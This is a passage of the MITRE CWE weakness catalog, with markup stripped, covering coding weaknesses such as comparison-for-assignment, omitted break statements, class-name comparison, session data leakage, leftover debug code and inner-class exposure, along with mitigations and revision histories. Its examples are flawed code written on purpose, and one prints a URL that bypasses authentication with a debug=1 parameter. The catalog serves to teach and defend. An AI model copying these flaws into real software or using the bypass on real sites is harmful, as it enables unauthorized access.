Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Potential_Mitigations - - - - - The code uses an operator for comparison when the intention was to perform an assignment. - In many languages, the compare statement is very close in appearance to the assignment statement; they are often confused. - - - - - - - - - - Implementation - This bug primarily originates from a typo. - - - Low - - - Availability - Integrity - Unexpected State - The assignment will not take place, which should cause obvious program execution problems. - - - - - Testing - Many IDEs and static analysis products will detect this problem. - - - - - The following example demonstrates the weakness. - - void called(int foo) {foo==1;if (foo==1) System.out.println("foo\n");}int main() { - - called(2);return 0; - } - - - - The following C/C++ example shows a simple implementation of a stack that includes methods for adding and removing integer values from the stack. The example uses pointers to add and remove integer values to the stack array variable. - - #define SIZE 50int *tos, *p1, stack[SIZE]; - void push(int i) { - p1++;if(p1==(tos+SIZE)) { - - - // Print stack overflow error message and exit - - - }*p1 == i; - } - int pop(void) { - if(p1==tos) { - - - // Print stack underflow error message and exit - - - }p1--;return *(p1+1); - } - int main(int argc, char *argv[]) { - - - // initialize tos and p1 to point to the top of stack - tos = stack;p1 = stack; - // code to add and remove items from stack - ...return 0; - } - - The push method includes an expression to assign the integer value to the location in the stack pointed to by the pointer variable. - However, this expression uses the comparison operator "==" rather than the assignment operator "=". The result of using the comparison operator instead of the assignment operator causes erroneous values to be entered into the stack and can cause unexpected results. - - - - - Comparing instead of assigning - - - SFP2 - Unused Entities - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Common_Consequences, Modes_of_Introduction - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error. - In some languages, braces (or other delimiters) are optional for blocks. When the delimiter is omitted, it is possible to insert a logic error in which a statement is thought to be in a block but is not. In some cases, the logic error can have security implications. - - - - - - Primary - - - Indirect - - - - - - - - - Implementation - - - Low - - - Confidentiality - Integrity - Availability - Alter Execution Logic - This is a general logic error which will often lead to obviously-incorrect behaviors that are quickly noticed and fixed. In lightly tested or untested code, this error may be introduced it into a production environment and provide additional attack vectors by creating a control flow path leading to an unexpected state in the application. The consequences will depend on the types of behaviors that are being incorrectly executed. - - - - - Implementation - Always use explicit block delimitation and use static-analysis technologies to enforce this practice. - - - - - In this example, the programmer has indented the statements to call Do_X() and Do_Y(), as if the intention is that these functions are only called when the condition is true. However, because there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false. - - if (condition==true)Do_X();Do_Y(); - - - This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability. - - - In this example, the programmer has indented the Do_Y() statement as if the intention is that the function should be associated with the preceding conditional and should only be called when the condition is true. However, because Do_X() was called on the same line as the conditional and there are no braces to signify the block, Do_Y() will always be executed, even if the condition is false. - - if (condition==true) Do_X();Do_Y(); - - - This might not be what the programmer intended. When the condition is critical for security, such as in making a security decision or detecting a critical error, this may produce a vulnerability. - - - - - CVE-2014-1266 - incorrect indentation of "goto" statement makes it more difficult to detect an incorrect goto (Apple's "goto fail") - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1266 - - - - - Incorrect block delimitation - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Observed_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - Michael Koo and Paul Black - NIST - 2010-04-28 - Correction to Demonstrative Examples - - - - - The program omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition. - This can lead to critical code executing in situations where it should not. - - - - - - - Primary - - - Indirect - - - - - - - - - - - - Implementation - - - Medium - - - Other - Alter Execution Logic - This weakness can cause unintended logic to be executed and other unexpected application behavior. - - - - - White Box - Omission of a break statement might be intentional, in order to support fallthrough. Automated detection methods might therefore be erroneous. Semantic understanding of expected program behavior is required to interpret whether the code is correct. - - - Black Box - Since this weakness is associated with a code construct, it would be indistinguishable from other errors that produce the same behavior. - - - - - Implementation - Omitting a break statement so that one may fall through is often indistinguishable from an error, and therefore should be avoided. If you need to use fall-through capabilities, make sure that you have clearly documented this within the switch statement, and ensure that you have examined all the logical possibilities. - - - Implementation - The functionality of omitting a break statement could be clarified with an if statement. This method is much safer. - - - - - In both of these examples, a message is printed based on the month passed into the function: - - public void printMessage(int month){ - switch (month) { - - case 1: print("January");case 2: print("February");case 3: print("March");case 4: print("April");case 5: print("May");case 6: print("June");case 7: print("July");case 8: print("August");case 9: print("September");case 10: print("October");case 11: print("November");case 12: print("December"); - }println(" is a great month"); - } - - - void printMessage(int month){ - switch (month) { - - case 1: printf("January");case 2: printf("February");case 3: printf("March");case 4: printf("April");case 5: printff("May");case 6: printf("June");case 7: printf("July");case 8: printf("August");case 9: printf("September");case 10: printf("October");case 11: printf("November");case 12: printf("December"); - }printf(" is a great month"); - } - - Both examples do not use a break statement after each case, which leads to unintended fall-through behavior. For example, calling "printMessage(10)" will result in the text "OctoberNovemberDecember is a great month" being printed. - - - - - Omitted break statement - - - SFP4 - Unchecked Status Condition - - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Description, Detection_Factors, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Name, Other_Notes, Potential_Mitigations, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Weakness_Ordinalities - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - Omitted Break Statement - - - - The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name. - If the decision to trust the methods and data of an object is based on the name of a class, it is possible for malicious users to send objects of the same name as trusted classes and thereby gain the trust afforded to known classes and types. - - - - - - - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - If a program relies solely on the name of an object to determine identity, it may execute the incorrect or unintended code. - - - - - Implementation - Use class equivalency to determine type. Rather than use the class name to determine if an object is of a given type, use the getClass() method, and == operator. - - - - - In this example, the expression in the if statement compares the class of the inputClass object to a trusted class by comparing the class names. - - if (inputClass.getClass().getName().equals("TrustedClassName")) { - - - // Do something assuming you trust inputClass - - - // ... - - - } - - However, multiple classes can have the same name therefore comparing an object's class by name can allow untrusted classes of the same name as the trusted class to be use to execute unintended or incorrect code. To compare the class of an object to the intended class the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example. - - if (inputClass.getClass() == TrustedClass.class) { - - - // Do something assuming you trust inputClass - - - // ... - - - } - - - - In this example, the Java class, TrustedClass, overrides the equals method of the parent class Object to determine equivalence of objects of the class. The overridden equals method first determines if the object, obj, is the same class as the TrustedClass object and then compares the object's fields to determine if the objects are equivalent. - - public class TrustedClass { - ... - @Overridepublic boolean equals(Object obj) { - boolean isEquals = false; - - // first check to see if the object is of the same class - if (obj.getClass().getName().equals(this.getClass().getName())) { - - - // then compare object fields - ...if (...) {isEquals = true;} - } - return isEquals; - } - ... - } - - However, the equals method compares the class names of the object, obj, and the TrustedClass object to determine if they are the same class. As with the previous example using the name of the class to compare the class of objects can lead to the execution of unintended or incorrect code if the object passed to the equals method is of another class with the same name. To compare the class of an object to the intended class, the getClass() method and the comparison operator "==" should be used to ensure the correct trusted class is used, as shown in the following example. - - public boolean equals(Object obj) { - ... - - // first check to see if the object is of the same class - if (obj.getClass() == this.getClass()) {...} - ... - } - - - - - - Comparing Classes by Name - - - Comparing classes by name - - - OBJ09-J - Compare classes and not class names - - - SFP1 - Glitch in computation - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Description, Relationships, Other_Notes, Relevant_Properties, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Relevant_Properties - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Comparing Classes by Name - - - - Java packages are not inherently closed; therefore, relying on them for code security is not a good practice. - The purpose of package scope is to prevent accidental access by other parts of a program. This is an ease-of-software-development feature but not a security feature. - - - - - - - - - Implementation - - - Medium - - - Confidentiality - Read Application Data - Any data in a Java package can be accessed outside of the Java framework if the package is distributed. - - - Integrity - Modify Application Data - The data in a Java class can be modified by anyone outside of the Java framework if the packages is distributed. - - - - - Architecture and Design - Implementation - Data should be private static and final whenever possible. This will assure that your code is protected by instantiating early, preventing access and tampering. - - - - - The following example demonstrates the weakness. - - package math;public class Lebesgue implements Integration{ - public final Static String youAreHidingThisFunction(functionToIntegrate){ - - return ...; - } - } - - - - - - Relying on package-level scope - - - MET04-J - Do not increase the accessibility of overridden or hidden methods - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Type - - Relying on Package-level Scope - - - - The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session. - - Data can "bleed" from one session to another through member variables of singleton objects, such as Servlets, and objects from a shared pool. - In the case of Servlets, developers sometimes do not understand that, unless a Servlet implements the SingleThreadModel interface, the Servlet is a singleton; there is only one instance of the Servlet, and that single instance is used and re-used to handle multiple requests that are processed simultaneously by different threads. A common result is that developers use Servlet member fields in such a way that one user may inadvertently see another user's data. In other words, storing user data in Servlet member fields introduces a data access race condition. - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Read Application Data - - - - - Architecture and Design - Protect the application's sessions from information leakage. Make sure that a session's data is not used or visible by other sessions. - - - Testing - Use a static analysis tool to scan the code for information leakage vulnerabilities (e.g. Singleton Member Field). - - - Architecture and Design - In a multithreading environment, storing user data in Servlet member fields introduces a data access race condition. Do not use member fields to store information in the Servlet. - - - - - The following Servlet stores the value of a request parameter in a member field and then later echoes the parameter value to the response output stream. - - public class GuestBook extends HttpServlet { - String name; - protected void doPost (HttpServletRequest req, HttpServletResponse res) {name = req.getParameter("name");...out.println(name + ", thanks for visiting!");} - } - - While this code will work perfectly in a single-user environment, if two users access the Servlet at approximately the same time, it is possible for the two request handler threads to interleave in the following way: Thread 1: assign "Dick" to name Thread 2: assign "Jane" to name Thread 1: print "Jane, thanks for visiting!" Thread 2: print "Jane, thanks for visiting!" Thereby showing the first user the second user's name. - - - - - Data Leaking Between Users - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships, Type - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Data Leaking Between Users - Data Leak Between Sessions - - - - The application is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information. - A common development practice is to add "back door" code specifically designed for debugging or testing purposes that is not intended to be shipped or deployed with the application. These back door entry points create security risks because they are not considered during design or testing and fall outside of the expected operating conditions of the application. - - - - - - - Indirect - - - Primary - - - - - - - - Leftover debug code - This term originates from Seven Pernicious Kingdoms - - - - - Implementation - In web-based applications, debug code is used to test and modify web application properties, configuration information, and functions. If a debug application is left on a production server, this oversight during the "software process" allows attackers access to debug functionality. - - - Build and Compilation - - - Operation - - - - - Confidentiality - Integrity - Availability - Access Control - Other - Bypass Protection Mechanism - Read Application Data - Gain Privileges or Assume Identity - Varies by Context - The severity of the exposed debug application will depend on the particular instance. At the least, it will give an attacker sensitive information about the settings and mechanics of web applications on the server. At worst, as is often the case, the debug application will allow an attacker complete control over the web application and server, as well as confidential information that either of these access. - - - - - Build and Compilation - Distribution - Remove debug code before deploying the application. - - - - - Debug code can be used to bypass authentication. For example, suppose an application has a login script that receives a username and a password. Assume also that a third, optional, parameter, called "debug", is interpreted by the script as requesting a switch to debug mode, and that when this parameter is given the username and password are not checked. In such a case, it is very simple to bypass the authentication process if the special behavior of the application regarding the debug parameter is known. In a case where the form is: - - <FORM ACTION="/authenticate_login.cgi"><INPUT TYPE=TEXT name=username><INPUT TYPE=PASSWORD name=password><INPUT TYPE=SUBMIT></FORM> - - Then a conforming link will look like: - - http://TARGET/authenticate_login.cgi?username=...&password=... - - An attacker can change this to: - - http://TARGET/authenticate_login.cgi?username=&password=&debug=1 - - Which will grant the attacker access to the site, bypassing the authentication process. - - - - - Leftover Debug Code - - - A10 - Insecure Configuration Management - CWE More Specific - - - SFP28 - Unexpected access points - - - - - - - - - - - In J2EE a main method may be a good indicator that debug code has been left in the application, although there may not be any direct security impact. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Modes_of_Introduction, Other_Notes, Time_of_Introduction - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2019-01-03 - updated Weakness_Ordinalities - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Name, References, Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-07-20 - updated Alternate_Terms - - Leftover Debug Code - - - - A software system that accepts path input in the form of trailing slash ('filedir/') without appropriate validation can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. - - - - - - - - - - Implementation - - - Operation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - CVE-2002-0253 - Overlaps infoleak - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0253 - - - CVE-2001-0446 - Application server allows remote attackers to read source code for .jsp files by appending a / to the requested URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0446 - - - CVE-2004-0334 - Bypass Basic Authentication for files using trailing "/" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0334 - - - CVE-2001-0893 - Read sensitive files with trailing "/" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0893 - - - CVE-2001-0892 - Web server allows remote attackers to view sensitive files under the document root (such as .htpasswd) via a GET request with a trailing /. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0892 - - - CVE-2004-1814 - Directory traversal vulnerability in server allows remote attackers to read protected files via .. (dot dot) sequences in an HTTP request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1814 - - - BID:3518 - Source code disclosure - http://www.securityfocus.com/bid/3518 - - - - - filedir/ (trailing slash, trailing /) - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Path Issue - Trailing Slash - filedir/ - - - - A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state. - - - - - - - - - Implementation - - - - - Integrity - Other - Unexpected State - Varies by Context - - - - - Implementation - Make the cloneable() method final. - - - - - In this example, a public class "BankAccount" implements the cloneable() method which declares "Object clone(string accountnumber)": - - public class BankAccount implements Cloneable{ - public Object clone(String accountnumber) throwsCloneNotSupportedException{ - Object returnMe = new BankAccount(account number);... - - } - } - - - - In the example below, a clone() method is defined without being declared final. - - protected Object clone() throws CloneNotSupportedException {...} - - - - - - Mobile Code: Object Hijack - - - OBJ07-J - Sensitive classes must not let themselves be copied - - - SFP28 - Unexpected access points - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Mobile Code: Object Hijack - Public cloneable() Method Without Final (aka 'Object Hijack') - - - - Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers. - Inner classes quietly introduce several security concerns because of the way they are translated into Java bytecode. In Java source code, it appears that an inner class can be declared to be accessible only by the enclosing class, but Java bytecode has no concept of an inner class, so the compiler must transform an inner class declaration into a peer class with package level access to the original outer class. More insidiously, since an inner class can access private fields in its enclosing class, once an inner class becomes a peer class in bytecode, the compiler converts private fields accessed by the inner class into protected fields. - - - - - - - - - Implementation - - - Medium - - - Confidentiality - Read Application Data - "Inner Classes" data confidentiality aspects can often be overcome. - - - - - Implementation - Using sealed classes protects object-oriented encapsulation paradigms and therefore protects code from being extended in unforeseen ways. - - - Implementation - Inner Classes do not provide security. Warning: Never reduce the security of the object from an outer class, going to an inner class. If an outer class is final or private, ensure that its inner class is private as well. - - - - - The following Java Applet code mistakenly makes use of an inner class. - - public final class urlTool extends Applet {private final class urlHelper {...}...} - - - - The following example shows a basic use of inner classes. The class OuterClass contains the private member inner class InnerClass. The private inner class InnerClass includes the method concat that accesses the private member variables of the class OuterClass to output the value of one of the private member variables of the class OuterClass and returns a string that is a concatenation of one of the private member variables of the class OuterClass, the separator input parameter of the method and the private member variable of the class InnerClass. - - public class OuterClass { - // private member variables of OuterClass - private String memberOne;private String memberTwo; - - // constructor of OuterClass - public OuterClass(String varOne, String varTwo) {this.memberOne = varOne;this.memberTwo = varTwo;} - - // InnerClass is a member inner class of OuterClass - private class InnerClass {private String innerMemberOne; - public InnerClass(String innerVarOne) {this.innerMemberOne = innerVarOne;} - public String concat(String separator) { - // InnerClass has access to private member variables of OuterClass - System.out.println("Value of memberOne is: " + memberOne);return OuterClass.this.memberTwo + separator + this.innerMemberOne;}}} - - Although this is an acceptable use of inner classes it demonstrates one of the weaknesses of inner classes that inner classes have complete access to all member variables and methods of the enclosing class even those that are declared private and protected. When inner classes are compiled and translated into Java bytecode the JVM treats the inner class as a peer class with package level access to the enclosing class. - To avoid this weakness of inner classes, consider using either static inner classes, local inner classes, or anonymous inner classes. - The following Java example demonstrates the use of static inner classes using the previous example. The inner class InnerClass is declared using the static modifier that signifies that InnerClass is a static member of the enclosing class OuterClass. By declaring an inner class as a static member of the enclosing class, the inner class can only access other static members and methods of the enclosing class and prevents the inner class from accessing nonstatic member variables and methods of the enclosing class. In this case the inner class InnerClass can only access the static member variable memberTwo of the enclosing class OuterClass but cannot access the nonstatic member variable memberOne. - - public class OuterClass { - - - - // private member variables of OuterClass - private String memberOne;private static String memberTwo; - - // constructor of OuterClass - public OuterClass(String varOne, String varTwo) { - this.memberOne = varOne;this.memberTwo = varTwo;} - - // InnerClass is a static inner class of OuterClass - private static class InnerClass { - - private String innerMemberOne; - public InnerClass(String innerVarOne) {this.innerMemberOne = innerVarOne;}public String concat(String separator) { - - - // InnerClass only has access to static member variables of OuterClass - return memberTwo + separator + this.innerMemberOne; - } - } - } - - The only limitation with using a static inner class is that as a static member of the enclosing class the inner class does not have a reference to instances of the enclosing class. For many situations this may not be ideal. An alternative is to use a local inner class or an anonymous inner class as shown in the next examples. - - - In the following example the BankAccount class contains the private member inner class InterestAdder that adds interest to the bank account balance. The start method of the BankAccount class creates an object of the inner class InterestAdder, the InterestAdder inner class implements the ActionListener interface with the method actionPerformed. A Timer object created within the start method of the BankAccount class invokes the actionPerformed method of the InterestAdder class every 30 days to add the interest to the bank account balance based on the interest rate passed to the start method as an input parameter. The inner class InterestAdder needs access to the private member variable balance of the BankAccount class in order to add the interest to the bank account balance. - However as demonstrated in the previous example, because InterestAdder is a non-static member inner class of the BankAccount class, InterestAdder also has access to the private member variables of the BankAccount class - including the sensitive data contained in the private member variables for the bank account owner's name, Social Security number, and the bank account number. - - public class BankAccount { - - - // private member variables of BankAccount class - private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance; - - // constructor for BankAccount class - public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);} - - // start method will add interest to balance every 30 days - - - // creates timer object and interest adding action listener object - public void start(double rate){ActionListener adder = new InterestAdder(rate);Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start();} - - // InterestAdder is an inner class of BankAccount class - - - // that implements the ActionListener interface - private class InterestAdder implements ActionListener{ - private double rate; - public InterestAdder(double aRate){this.rate = aRate;} - public void actionPerformed(ActionEvent event){ - - - // update interest - double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest; - } - - } - } - - In the following example the InterestAdder class from the above example is declared locally within the start method of the BankAccount class. As a local inner class InterestAdder has its scope restricted to the method (or enclosing block) where it is declared, in this case only the start method has access to the inner class InterestAdder, no other classes including the enclosing class has knowledge of the inner class outside of the start method. This allows the inner class to access private member variables of the enclosing class but only within the scope of the enclosing method or block. - - public class BankAccount { - - - // private member variables of BankAccount class - private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance; - - // constructor for BankAccount class - public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);} - - // start method will add interest to balance every 30 days - - - // creates timer object and interest adding action listener object - public void start(final double rate){ - - - // InterestAdder is a local inner class - - - // that implements the ActionListener interface - class InterestAdder implements ActionListener{ - public void actionPerformed(ActionEvent event){ - - - // update interest - double interest = BankAccount.this.balance * rate / 100;BankAccount.this.balance += interest; - } - }ActionListener adder = new InterestAdder();Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start(); - } - } - - A similar approach would be to use an anonymous inner class as demonstrated in the next example. An anonymous inner class is declared without a name and creates only a single instance of the inner class object. As in the previous example the anonymous inner class has its scope restricted to the start method of the BankAccount class. - - public class BankAccount { - - - // private member variables of BankAccount class - private String accountOwnerName;private String accountOwnerSSN;private int accountNumber;private double balance; - - // constructor for BankAccount class - public BankAccount(String accountOwnerName, String accountOwnerSSN,int accountNumber, double initialBalance, int initialRate){this.accountOwnerName = accountOwnerName;this.accountOwnerSSN = accountOwnerSSN;this.accountNumber = accountNumber;this.balance = initialBalance;this.start(initialRate);} - - // start method will add interest to balance every 30 days - - - // creates timer object and interest adding action listener object - public void start(final double rate){ - - - // anonymous inner class that implements the ActionListener interface - ActionListener adder = new ActionListener(){ - public void actionPerformed(ActionEvent event){ - - - // update interest - - - double interest = BankAccount.this.balance * rate / 100; - BankAccount.this.balance += interest; - } - }; - Timer t = new Timer(1000 * 3600 * 24 * 30, adder);t.start(); - } - } - - - - In the following Java example a simple applet provides the capability for a user to input a URL into a text field and have the URL opened in a new browser window. The applet contains an inner class that is an action listener for the submit button, when the user clicks the submit button the inner class action listener's actionPerformed method will open the URL entered into the text field in a new browser window. As with the previous examples using inner classes in this manner creates a security risk by exposing private variables and methods. Inner classes create an additional security risk with applets as applets are executed on a remote machine through a web browser within the same JVM and therefore may run side-by-side with other potentially malicious code. - - 